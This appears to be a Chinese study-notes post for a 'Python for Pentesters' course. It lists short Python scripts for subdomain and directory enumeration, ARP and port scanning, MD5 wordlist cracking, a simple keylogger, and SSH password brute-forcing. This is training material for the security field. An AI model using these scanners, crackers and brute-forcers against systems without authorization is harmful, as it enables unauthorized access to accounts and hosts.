Python for Pentesters

还记得开始学习编程的C，虽然淡忘，但思想仍在。

子域名枚举

request库

import pyfiglet
import requests
import sys 

ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)

dir_path = ""

sub_list = open(dir_path, "r").read()
subdoms = sub_list.splitlines()

for sub in subdoms:
    sub_domains = f"http://{sub}.{sys.argv[1]}" 

    try:
        requests.get(sub_domains)
    except requests.ConnectionError:
        pass

    else:
        print("Valid domain: ",sub_domains)

目录枚举

还是requests

import requests
import sys
import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)

path = ''
sub_list = open(path,'r').read()
directories = sub_list.splitlines()

for dir in directories:
    dir_enum = f"http://{sys.argv[1]}/{dir}"
    r = requests.get(dir_enum)
    if r.status_code==404:
        pass
    else:
        print("Valid directory:" ,dir_enum)

网络扫描

from scapy.all import *
import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)

interface = "eth0"
ip_range = "10.10.X.X/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"

packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range) 

ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1)

for send,receive in ans:
        print (receive.sprintf(r"%Ether.src% - %ARP.psrc%"))

端口扫描

socket编程https://www.cnblogs.com/-Lucky-/p/17039661.html

import sys
import socket
import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)

ip = sys.argv[1]
open_ports =[]
ports = range(1, 65535)

def probe_port(ip, port):
    result = 1
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(0.5)
        r = sock.connect_ex((ip, port))
        if r == 0:
            result = r
        sock.close()
    except Exception as e:
        pass
    return result

for port in ports:
    sys.stdout.flush()
    response = probe_port(ip, port)
    if response == 0:
        open_ports.append(port) 

print(f"Open Ports:{open_ports}")

文件下载器

Linux 系统上的 Wget 或 Windows 上的 Certutil 是下载文件的有用工具。

import requests

url = 'https://assets.tryhackme.com/img/THMlogo.png'
r = requests.get(url, allow_redirects=True)
open('THMlogo.png', 'wb').write(r.content)

import requests

url = 'https://download.sysinternals.com/files/PSTools.zip'
r = requests.get(url, allow_redirects=True)
open('PSTools.zip', 'wb').write(r.content)

hash破解

tools：john，hashcat

import hashlib
import pyfiglet

ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)

wordlist_location = str(input('Enter wordlist file location: '))
hash_input = str(input('Enter hash to be cracked: '))

with open(wordlist_location, 'r') as file:
    for line in file.readlines():
        print(line)
        hash_ob = hashlib.md5(line.strip().encode())
        hashed_pass = hash_ob.hexdigest()
        if hashed_pass == hash_input:
            print('Found cleartext password! ' + line.strip())
            exit(0)

键盘记录器

import keyboard
keys = keyboard.record(until ='ENTER')
keyboard.play(keys)

ssh暴力破解

tools：hydra

import paramiko
import sys
import os

target = str(input('Please enter target IP address: '))
username = str(input('Please enter username to bruteforce: '))
password_file = str(input('Please enter location of the password file: '))

def ssh_connect(password, code=0):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(target, port=22, username=username, password=password)
    except paramiko.AuthenticationException:
        code = 1
    ssh.close()
    return code

with open(password_file, 'r') as file:
    for line in file.readlines():
        password = line.strip()

        try:
            response = ssh_connect(password)
            if response == 0:
                 print('password found: '+ password)
                 exit(0)
            elif response == 1:
                print('no luck')
        except Exception as e:
            print(e)
        pass
input_file.close()